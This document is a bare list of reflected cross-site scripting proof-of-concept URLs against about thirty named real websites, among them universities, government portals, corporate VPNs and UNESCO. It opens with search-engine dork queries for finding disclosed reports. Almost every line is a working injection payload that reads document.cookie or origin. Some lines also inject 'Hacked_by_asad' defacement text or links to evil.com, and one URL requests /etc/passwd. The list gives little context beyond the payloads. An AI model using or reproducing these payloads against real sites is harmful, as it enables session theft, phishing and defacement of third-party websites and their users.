Reflected XSS POC
Disclosed XSS Reports
site:openbugbounty.org inurl:reports intext:"*.com"
site:openbugbounty.org inurl:reports intext:"*.*.com"-----------------------------------------------------------
Site-1: www.dumooresystems.com
https://www.dumooresystems.com/drainage-products.php?cat=%3CScRiPt%3Ealert(1)%3C/sCrIpT%3E-----------------------------------------------------------
Site-2: tvtropes.org
https://tvtropes.org/pmwiki/index_report.php?filter=asad%22%3E%3Cscript%3Ealert(1)%3C/script%3E
https://tvtropes.org/pmwiki/login_prompt.php?referrer=%2Fpmwiki%2Farticle_history.php%3Farticle%3D%22%3E%3Cscript%3Ealert(1)%3C/script%3E
https://tvtropes.org/pmwiki/archived_discussion.php?s_t=%22%3E%3Cscript%3Ealert(1)%3C/script%3E-----------------------------------------------------------
Site-3: www.rallies.info
https://www.rallies.info/webentry/2022/yorkshirefestival/entries.php?type=s'-alert(1)-'-----------------------------------------------------------
Site-4: www.dom-home.me
https://www.dom-home.me/index.php/x%22%3E%3Csvg%20onload=%22alert(document.cookie)%22%3E/?strana=0&page=&lang=enhttps://www.dom-home.me/index.php?strana=9&lang=novosti%22%3E%3Csvg%20onload=%22alert(document.cookie)%22%3Ehttps://www.dom-home.me/index.php?strana=331&page=%3C/title%3E%3Cimg%20src=x%20onerror=%22alert(origin)%22%3E&lang=me-----------------------------------------------------------
Site-5: www.littlehardware.com
https://www.littlehardware.com/inet/storefront/store.php?mode=showproductdetail%27%22%3E%3Csvg%20onload=%22alert(document.cookie)%22%3E&product=-1&link_id=-1&link_itemcode=0917047&category=&department=36-----------------------------------------------------------
Sit-6: www.amigus.org
https://www.amigus.org/?s=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
https://www.amigus.org/web/usuarios/infousu.php?id=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E
https://www.amigus.org/web/fotos/party2006/index.php?dia=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E&fotoid=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E&paxina=%22%3E%3Csvg%20onload%3Dconfirm%281%29%3E-----------------------------------------------------------
Site-7: www.riftenergycorp.com
https://www.riftenergycorp.com/search?keywords=%22%3E%3Csvg%20onload=alert(1)%3E-----------------------------------------------------------
Site-8: www.dahaboo.com
https://www.dahaboo.com/login.php/'"><script>alert(1)</script>https://www.dahaboo.com/consoles-jeux-video-3/?t=1&q=ps4&'"><script>alert(1)</script>https://www.dahaboo.com/annonces/?.'"><script>alert(1)</script>-----------------------------------------------------------
Site-9: www.bookbazaar.com
https://www.bookbazaar.com/listing1.aspx?schoolid=%22;alert(document.domain)//
https://www.bookbazaar.com/listing1_booksetmsg.aspx?schoolid=%22;alert(document.domain)//
https://www.bookbazaar.com/category.aspx?categoryid=%22;alert(document.domain)//
https://www.bookbazaar.com/searchresult.aspx?searchname=%22;alert(document.domain)//-----------------------------------------------------------
Site-10: qau.edu.pk
https://qau.edu.pk/lateralentry/viewrecord.php/vlist.php?dept=Botany&list=%27%22%3E%3Csvg/onload=alert(document.cookie)%3E
https://qau.edu.pk/even/fee.php?list=%27%22%3E%3Csvg/onload=alert(document.cookie)%3E
https://qau.edu.pk/lateralentry/viewrecord.php?id=UFM24-06391%27%22%3Csvg/onload=alert(document.cookie)%3E&list=1
https://ncb.qau.edu.pk/index.php/13-news.html?start=%277%22%3E%3Csvg/onload=alert(document.cookie)%3E
https://admissions.qau.edu.pk/msc/fee.php?list=%277%22%3E%3Csvg/onload=alert(document.cookie)%3E-----------------------------------------------------------
Site-11: 3dcomment-prod.ext.net.nokia.com
https://3dcomment-prod.ext.net.nokia.com/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(/Hacked-by-Muhammad_Asad/)\u0022\u003e&SMAUTHREASON=7-----------------------------------------------------------
Site-12: eportal.pwc.ca
https://eportal.pwc.ca/siteminderagent/forms/smaceauth.fcc?USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e&SMAUTHREASON=7-----------------------------------------------------------
Site-13: dic.sindhila.edu.pk
https://dic.sindhila.edu.pk/index.php?txtsrch=%3Csvg/onload=confirm(document.cookie)%3ESite-14: pwr.nu.edu.pk
http://pwr.nu.edu.pk/news-detail/?news-detail=%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm%281%29%3E
http://pwr.nu.edu.pk/upcoming-event-detail/?event_detail=%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm%281%29%3E-----------------------------------------------------------
Site-15: www.textileasia.com.pk
https://www.textileasia.com.pk/visitor-profile.php?id=faisalabad%22%3E%3Csvg%20onload=confirm(1)%3E-----------------------------------------------------------
Site-16: iportal.riphah.edu.pk
https://iportal.riphah.edu.pk/serial-stats/?r=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E-----------------------------------------------------------
Site-17: deptewb.mcd.gov.in
https://deptewb.mcd.gov.in:8443/mcd_commonweb/cmnfileuploadgetDocumentScreen2.action?&category=EODB%20Checklist&loginType=CITIZEN&USER_INFO=02-e8de24eff7b4eac80fe70d819acec6b31063cedf&struts.token.name=mcd.token&mcd.token=8KV5RP2TIOKCDMLZVT03UKGBMQA8BHKP&node=22231%22%3E%3Csvg%20onload=confirm(document.cookie)%3Ehacked&LID=1525438014776-16-----------------------------------------------------------
Site-18: www.hope.ac.uk
https://www.hope.ac.uk/eventsCalendar/t4.do?lang=en&dt=d.en.5326&f=month&d=01/10/2017%22%3E%3Csvg%20onload=confirm(document.cookie)%3E&sd=Friday,13October2017,&ac=*-----------------------------------------------------------
Site-19: www.hope.ac.uk
http://adminonline.ucp.edu.pk/Admin/AdminLogoff.jsp?des=%3Ch1%3E%3Cb%3E%3Ci%3E%3Cu%3E%3Cmarquee%3EHacked_by_asad%3C/marquee%3E-----------------------------------------------------------
Site-20: pl.neduet.edu.pk
https://pl.neduet.edu.pk/?degtype=2&index_msg=Rxss%22%3E%3Ch1%3Easad
https://pl.neduet.edu.pk/ajax.jsp?str=asad%22%3E%3Ca%20href=https://evil.com%3Ehacked%3Cimg%20src=x%20onerror=confirm(origin)%3E-----------------------------------------------------------
Site-21: mcom.pgc.edu.pk
https://mcom.pgc.edu.pk/Admin/AdminLogin.jsp?usr=%22%3E%3C/a%3E%3C/TR%3E%3C/TBODY%3E%3C/TABLE%3E%3Ch1%3E%3Cb%3E%3Ci%3E%3Cu%3E%3Cmarquee%3EHacked_by_asad%3C/marquee%3E
https://mcom.pgc.edu.pk/Admin/AdminLogin.jsp?des=%3Ch1%3E%3Cb%3E%3Ci%3E%3Cu%3E%3Cmarquee%3EHacked_by_asad%3C/marquee%3E-----------------------------------------------------------
Site-22: adminonline.ucp.edu.pk
http://adminonline.ucp.edu.pk/Admin/AdminLogoff.jsp?des=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E
http://adminonline.ucp.edu.pk/Admin/AdminLogin.jsp?usr=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(document.cookie)%3E-----------------------------------------------------------
Site-23: dv.ue.edu.pk
https://dv.ue.edu.pk/auth/admin/login.php?er=%22%3E%3Ca%20href=https://evil.com%3Ehacked%3Cimg%20src=x%20onerror=confirm(origin)%3E
https://dv.ue.edu.pk/auth/admin/login.php?rs=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(origin)%3E-----------------------------------------------------------
Site-24: www.dawn.com
https://www.dawn.com/news/1504211%22%3E%3Ca%20href=https://evil.com%3Ehacked%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E-----------------------------------------------------------
Site-25: nust.edu.pk
https://nust.edu.pk/faq-category/ug-admission%27%3E%3Cmarquee%3E%3Ch1%3E%3Cu%3E%3Ci%3E/
https://qa.nust.edu.pk/news-category/excellent-performance-award%27%3E%3Cmarquee%3E%3Ch1%3E%3Cu%3E%3Ci%3E/
https://qa.nust.edu.pk/news-category/accreditation-of-engineering-programs-under-washington-accord%27%3E%3Cmarquee%3E%3Ch1%3E%3Cu%3E%3Ci%3E/
https://qa.nust.edu.pk/news-category/webinars%27%3E%3Cmarquee%3E%3Ch1%3E%3Cu%3E%3Ci%3E/
https://sc.seecs.nust.edu.pk/roschedule.php?scheduleid=%27%22%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=alert(origin)%3E
https://qdemocms.nust.edu.pk/slides?head=asad%27%22%3E%3Cimg%20src=x%20onerror=confirm(origin)%3E
https://www.fics.nust.edu.pk/about/evaluation.php?stage=1%27%22%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=alert(origin)%3E
https://www.fics.nust.edu.pk/idea/best.php?year=2024%27%22%3E%3Cmarquee%3E%3Cimg%20src=x%20onerror=alert(origin)%3E
https://www.fics.nust.edu.pk/admin/admin-login-secured.php?msg=%3Cscript%3Ealert(1)%3C/script%3E
https://www.fics.nust.edu.pk/admin-login-secured.php?msg=%3Cscript%3Ealert(1)%3C/script%3E
https://www.fics.nust.edu.pk/login.php?msg=%3Cscript%3Ealert(1)%3C/script%3E-----------------------------------------------------------
Site-26: appneta-ft.vpn.broadcom.com
https://appneta-ft.vpn.broadcom.com/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer-----------------------------------------------------------
Site-27: admission.lumhs.edu.pk
https://admission.lumhs.edu.pk/web/home/tv.php?filesrc=/etc/passwd&path=\%22%3EK=%27%3E%3CSvg/OnLoad=(confirm)(origin)%3E-----------------------------------------------------------
Site-28: op.europa.eu
https://op.europa.eu/flexpaper/common/split_document.jsp?doc=d3e77637-a963-11eb-9585-01aa75ed71a1.en.PDF.pdf&userId&systemId=Portal2012&documentId=d3e77637-a963-11eb-9585-01aa75ed71a1&documentTitle=The+EU%E2%80%99s+2021-2027+long-term+budget+and+NextGenerationEU&documentPublishingDate&localeDirectory=%2Fflexpaper%2Flocale%2F&localeChain=en_US&fitWidth=true&documentLanguage=en%22;-alert(origin)-%22&share
https://portal-training.emsa.europa.eu/o/marketplace-app-manager-web/icon.jsp?iconURL=https:///%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E-----------------------------------------------------------
Site-29: www.embryohotel.com
http://www.embryohotel.com/room-detail.php?id=1%27%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E-----------------------------------------------------------
Site-30: archive.jang.com.pk
https://archive.jang.com.pk/pic.asp?npic=03-16-2016/Lahore/images/02_01.gif%22;-alert(1)//
https://archive.jang.com.pk/10-20-2015/lahore/pic.asp?photo=10_01.jpg'"/><img%20src=x%20onerror=alert(1)>
https://archive.jang.com.pk/03-16-2016/lahore/pic.asp?picname=01_01.gif'"/><img%20src=x%20onerror=alert(1)>-----------------------------------------------------------
Site-30: stanford.edu
http://odbook.stanford.edu/viewing%27%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E/anonymousagent/2?crumb_item_type=item&crumb_filter=creator.1
http://deme.stanford.edu/viewing/comment%22;-alert(document.cookie)-%22/new?populate_item=6
https://wellforlife-portal.stanford.edu/register.php?msg=%27%22/%3E%3Cimg%20src=x%3E%3Ca%20href=https://evil.com%3EClick%3C/strong%3E%3C/li%3E%3C/ul%3E%3C/div%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E-----------------------------------------------------------
Site-30: library.mul.edu.pk
https://library.mul.edu.pk/details.php?tid=113'"><img src=x onerror=alert(document.cookie)>
https://mul.edu.pk/en/program/mphilms-computer-science%22%3EK='%3E%3CSvg%252FOnLoad=(confirm)(document.cookie)%3E-----------------------------------------------------------
Site-30: lunesco.org
https://gp.unesco.org/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
https://www.unesco.org/archives/multimedia/?pg=34iy3j4h234hjb23234&related=Gxss%27%22%3E%3Cimg/src/onerror=(confirm)(origin)%3E
https://www.unesco.org/archives/multimedia/?pg=34iy3j4h234hjb23234&related=Gxss%27%22%3E%3Cimg/src/onerror=(confirm)(origin)%3E
https://genbase.iiep.unesco.org/applis/tara/_login.php?page=/applis/tara/index.php%27%22%3E%3Ca%20href=https://evil.com%3Ehacked&CONFIG=1
https://www.unesco.org/archives/multimedia/index.php?page=2&pg=34&pattern&video=1\">K='><Svg/OnLoad=(confirm)(origin)>
http://www.unesco.org/archives/multimedia/index.php/index.php?pg=13&sp=13\">K='><Svg/OnLoad=(confirm)(origin)>&sj=Intangible+heritage
https://www.unesco.org/archives/multimedia/index.php/index.php/">K='><Svg/OnLoad=(confirm)(origin)>?pg=34&tp=Documentary
https://www.unesco.org/archives/multimedia/index.php?page=2&pg=34&pattern&audiopattern=audio+recording\">K='><Svg/OnLoad=(confirm)(origin)>Last updated